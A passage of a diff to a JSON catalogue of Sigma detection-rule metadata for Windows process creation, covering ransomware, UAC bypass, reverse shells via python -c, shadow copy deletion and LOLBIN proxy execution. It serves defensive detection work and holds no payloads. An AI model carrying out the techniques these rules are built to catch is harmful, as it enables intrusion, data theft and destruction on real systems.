"https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_maze_ransomware.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002", + "attack.t1047", + "attack.impact", + "attack.t1490" + 
] + }, + "uuid": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", + "value": "Maze Ransomware" + }, + { + "description": "Detects when a program changes the default file association of any extension to an executable", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_change_default_file_assoc_susp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/assoc", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_change_default_file_assoc_susp.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.001" + ] + }, + "uuid": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", + "value": "Change Default File Association To Executable" + }, + { + "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", + "meta": { + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unknown sub processes of Wsreset.exe" + ], + "filename": "proc_creation_win_uac_bypass_wsreset.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", + "https://www.activecyber.us/activelabs/windows-uac-bypass", + "https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html", + "https://twitter.com/ReaQta/status/1222548288731217921", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" + ] + }, + "uuid": "d797268e-28a9-49a7-b9a8-2f5039011c5c", + "value": "Bypass UAC via WSReset.exe" + }, + { + "description": "Detects LockerGoga Ransomware command line.", + "meta": { + "author": "Vasiliy Burov, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_mal_lockergoga_ransomware.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a", + "https://blog.f-secure.com/analysis-of-lockergoga-ransomware/", + "https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_lockergoga_ransomware.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ] + }, + "uuid": "74db3488-fd28-480a-95aa-b7af626de068", + "value": "LockerGoga Ransomware" + }, + { + "description": "Detects execution of python using the \"-c\" flag. 
This is could be used as a way to launch a reverse shell or execute live python code.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_python_inline_command_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", + "https://www.revshells.com/", + "https://docs.python.org/3/using/cmdline.html#cmdoption-c", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_inline_command_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "899133d5-4d7c-4a7f-94ee-27355c879d90", + "value": "Python Inline Command Execution" + }, + { + "description": "Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation but rarely used by administrators", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/08/13", + "falsepositive": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" + ], + "filename": "proc_creation_win_susp_whoami.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", + "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" + ] + }, + "uuid": "e28a5a99-da44-436d-b7a0-2afc20a5f413", + "value": "Whoami Execution" + }, + { + "description": "Detects a ping command that uses a hex encoded IP address", + "meta": { + "author": "Florian Roth", + 
"creation_date": "2018/03/23", + "falsepositive": [ + "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" + ], + "filename": "proc_creation_win_susp_ping_hex_ip.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna", + "https://twitter.com/vysecurity/status/977198418354491392", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_hex_ip.yml" ], "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.t1140", + "attack.t1027" ] }, - "uuid": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", - "value": "Download Arbitrary Files Via MSPUB.EXE" + "uuid": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", + "value": "Ping Hex IP" }, { - "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.", + "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_schtasks_system.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_system.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "89ca78fd-b37c-4310-b3d3-81a023f83936", + "value": "Schtasks Creation Or Modification With SYSTEM Privileges" + }, + { + "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious 
parent process, which could be indicative of code injection.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_parent_of_conhost.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parent_of_conhost.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", + "value": "Conhost Spawned By Suspicious Parent Process" + }, + { + "description": "Detects a ZxShell start by the called and well-known function name", + "meta": { + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "creation_date": "2017/07/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_apt_zxshell.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_zxshell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003", + "attack.defense_evasion", + "attack.t1218.011", + "attack.s0412", + "attack.g0001" + ] + }, + "uuid": "f0b70adb-0075-43b0-9745-e82a1c608fcc", + "value": "ZxShell Malware" + }, + { + "description": "Attackers may leverage fsutil to enumerated connected drives.", "meta": { "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", - "creation_date": "2022/01/25", + "creation_date": "2022/03/29", "falsepositive": [ - "Rare false positives could occur on servers with multiple drives." 
+ "Certain software or administrative tasks may trigger false positives." ], - "filename": "proc_creation_win_lolbin_not_from_c_drive.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2021/12/13/diavol-ransomware/", - "https://www.scythe.io/library/threat-emulation-qakbot", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_not_from_c_drive.yml" - ], - "tags": [ - "attack.t1218.001" - ] - }, - "uuid": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", - "value": "LOLBIN From Abnormal Drive" - }, - { - "description": "Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory", - "meta": { - "author": "frack113", - "creation_date": "2022/03/06", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_offlinescannershell.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_offlinescannershell.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "02b18447-ea83-4b1b-8805-714a8a34546a", - "value": "Suspicious OfflineScannerShell.exe Execution From Another Folder" - }, - { - "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/16", - "falsepositive": [ - "Legitimate use by an administrator" - ], - "filename": "proc_creation_win_lolbin_openconsole.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/nas_bench/status/1537563834478645252", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "814c95cc-8192-4378-a70a-f1aafd877af1", - "value": "Use of OpenConsole" - }, - { - "description": "Execute commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This is used as a LOLBIN for example to bypass application whitelisting.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/14", - "falsepositive": [ - "Legitimate use by a via a batch script or by an administrator." - ], - "filename": "proc_creation_win_lolbin_pcalua.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Pcalua/", - "https://pentestlab.blog/2020/07/06/indirect-command-execution/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", - "value": "Use of Pcalua For Execution" - }, - { - "description": "Detect indirect command execution via Program Compatibility Assistant pcwrun.exe", - "meta": { - "author": "A. 
Sungurov , oscd.community", - "creation_date": "2020/10/12", - "falsepositive": [ - "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts", - "Legit usage of scripts" - ], - "filename": "proc_creation_win_lolbin_pcwrun.yml", + "filename": "proc_creation_win_fsutil_drive_enumeration.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/pabraeken/status/991335019833708544", - "https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun.yml" + "Turla has used fsutil fsinfo drives to list connected drives. https://attack.mitre.org/techniques/T1120/", + "https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_drive_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1120" + ] + }, + "uuid": "63de06b9-a385-40b5-8b32-73f2b9ef84b6", + "value": "Fsutil Drive Enumeration" + }, + { + "description": "Detects execution of \"sc.exe\" to query information about registered services on the system", + "meta": { + "author": "frack113", + "creation_date": "2021/12/06", + "falsepositive": [ + "Legitimate query of a service by an administrator to get more information such as the state or PID" + ], + "filename": "proc_creation_win_sc_query.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-1---system-service-discovery", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_query.yml" + ], + "tags": [ + 
"attack.discovery", + "attack.t1007" + ] + }, + "uuid": "57712d7a-679c-4a41-a913-87e7175ae429", + "value": "SC.EXE Query Execution" + }, + { + "description": "Detect usage of the \"ssh.exe\" binary as a proxy to launch other programs", + "meta": { + "author": "frack113", + "creation_date": "2022/12/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_ssh.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ssh/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.t1218" ] }, - "uuid": "b97cd4b1-30b8-4a9d-bd72-6293928d52bc", - "value": "Indirect Command Execution By Program Compatibility Wizard" + "uuid": "7d6d30b8-5b91-4b90-a891-46cccaf29598", + "value": "Lolbin Ssh.exe Use As Proxy" }, { - "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", + "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/13", + "author": "Agro (@agro_sev) oscd.communitly", + "creation_date": "2020/10/13", "falsepositive": [ - "Unlikely" + "Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action." 
], - "filename": "proc_creation_win_lolbin_pcwrun_follina.yml", + "filename": "proc_creation_win_susp_use_of_sqltoolsps_bin.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml", + "https://twitter.com/pabraeken/status/993298228840992768", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqltoolsps_bin.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", + "value": "SQL Client Tools PowerShell Session Detection" + }, + { + "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", + "meta": { + "author": "Ivan Dyachkov, Yulia Fomina, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_register_cimprovider.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/PhilipTsukerman/status/992021361106268161", + "https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574" + ] + }, + "uuid": "a2910908-e86f-4687-aeba-76a5f996e652", + "value": "DLL Execution Via Register-cimprovider.exe" + }, + { + "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", + "meta": { + "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", + "creation_date": "2019/10/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_run_powershell_script_from_ads.yml", "level": "high", "logsource.category": 
"process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/nas_bench/status/1535663791362519040", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml" + "https://github.com/p0shkatz/Get-ADS/blob/1c3a3562e713c254edce1995a7d9879c687c7473/Get-ADS.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_ads.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" - ] - }, - "uuid": "6004abd0-afa4-4557-ba90-49d172e0a299", - "value": "Execute Pcwrun.EXE To Leverage Follina" - }, - { - "description": "Tools to Capture Network Packets on the windows 10 with October 2018 Update or later.", - "meta": { - "author": "frack113", - "creation_date": "2022/03/17", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_lolbin_pktmon.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Pktmon/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1040" - ] - }, - "uuid": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", - "value": "Use of PktMon.exe" - }, - { - "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files. 
It can be abused to run malicious \".xbap\" files any bypass AWL", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/01", - "falsepositive": [ - "Legitimate \".xbap\" being executed via \"PresentationHost\"" - ], - "filename": "proc_creation_win_lolbin_presentationhost.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" - ] - }, - "uuid": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", - "value": "Application Whitelisting Bypass via PresentationHost.exe" - }, - { - "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_presentationhost_download.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/239/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" - ] - }, - "uuid": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", - "value": "Download Arbitrary Files Via PresentationHost.exe" - }, - { - "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. 
PrintBrm.exe should not be run on a normal workstation.", - "meta": { - "author": "frack113", - "creation_date": "2022/05/02", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_printbrm.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105", "attack.defense_evasion", "attack.t1564.004" ] }, - "uuid": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", - "value": "PrintBrm ZIP Creation of Extraction" + "uuid": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", + "value": "Run PowerShell Script from ADS" }, { - "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", + "description": "Shadow Copies deletion using operating systems utilities", "meta": { - "author": "frack113", - "creation_date": "2022/05/28", + "author": "Florian Roth, Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", + "creation_date": "2019/10/22", "falsepositive": [ - "Unknown" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", + "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" ], - "filename": "proc_creation_win_lolbin_pubprn.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/Pubprn/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216.001" - ] - }, - "uuid": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", - "value": "Pubprn.vbs Proxy Execution" - }, - { - "description": "Detects using Rasautou.exe for 
loading arbitrary .DLL specified in -d option and executes the export specified in -p.", - "meta": { - "author": "Julia Fomina, oscd.community", - "creation_date": "2020/10/09", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_lolbin_rasautou_dll_execution.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Rasautou/", - "https://github.com/fireeye/DueDLLigence", - "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "cd3d1298-eb3b-476c-ac67-12847de55813", - "value": "DLL Execution via Rasautou.exe" - }, - { - "description": "Detects suspicious execution of Regasm/Regsvcs utilities", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/25", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_regasm.yml", + "filename": "proc_creation_win_shadow_copies_deletion.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.fortiguard.com/threat-signal-report/4718?s=09", - "https://lolbas-project.github.io/lolbas/Binaries/Regasm/", - "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml" + "https://redcanary.com/blog/intelligence-insights-october-2021/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/", + "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/", + "https://github.com/Neo23x0/Raccine#the-process", + 
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://blog.talosintelligence.com/2017/05/wannacry.html", + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar", + "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_deletion.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1218.009" + "attack.impact", + "attack.t1070", + "attack.t1490" ] }, - "uuid": "cc368ed0-2411-45dc-a222-510ace303cb2", - "value": "Regasm/Regsvcs Suspicious Execution" + "uuid": "c947b146-0abc-4c87-9c64-b17e9d7274a2", + "value": "Shadow Copies Deletion Using Operating Systems Utilities" + }, + { + "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wab_execution_from_non_default_location.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", + "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ] + }, + "uuid": "395907ee-96e5-4666-af2e-2ca91688e151", + 
"value": "Wab Execution From Non Default Location" + }, + { + "description": "Detects usage of bitsadmin downloading a file", + "meta": { + "author": "Michael Haag, FPT.EagleEye", + "creation_date": "2017/03/09", + "falsepositive": [ + "Some legitimate apps use this, but limited." + ], + "filename": "proc_creation_win_bitsadmin_download.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://isc.sans.edu/diary/22264", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" + ] + }, + "uuid": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", + "value": "Bitsadmin Download" + }, + { + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", + "meta": { + "author": "Timur Zinniatullin, E.M. Anhaus, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Highly likely if rar is a default archiver in the monitored environment." 
+ ], + "filename": "proc_creation_win_data_compressed_with_rar.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_data_compressed_with_rar.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "6f3e2987-db24-4c78-a860-b4f4095a7095", + "value": "Data Compressed - rar.exe" + }, + { + "description": "Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "meta": { + "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali", + "creation_date": "2022/12/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sharp_impersonation_tool.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/", + "https://github.com/S3cur3Th1sSh1t/SharpImpersonation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharp_impersonation_tool.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" + ] + }, + "uuid": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", + "value": "SharpImpersonation Execution" + }, + { + "description": "Detects the import of the '.reg' files from suspicious paths using the 'reg.exe' utility", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Legitimate import of keys" + ], + "filename": 
"proc_creation_win_reg_import_from_suspicious_paths.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml" + ], + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ] + }, + "uuid": "62e0298b-e994-4189-bc87-bc699aa62d97", + "value": "Imports Registry Key From a File Using Reg.exe" + }, + { + "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/10", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_get_localgroup_member_recon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_get_localgroup_member_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001" + ] + }, + "uuid": "c8a180d6-47a3-4345-a609-53f9c3d834fc", + "value": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet" + }, + { + "description": "Detects suspicious command line arguments of common data compression tools", + "meta": { 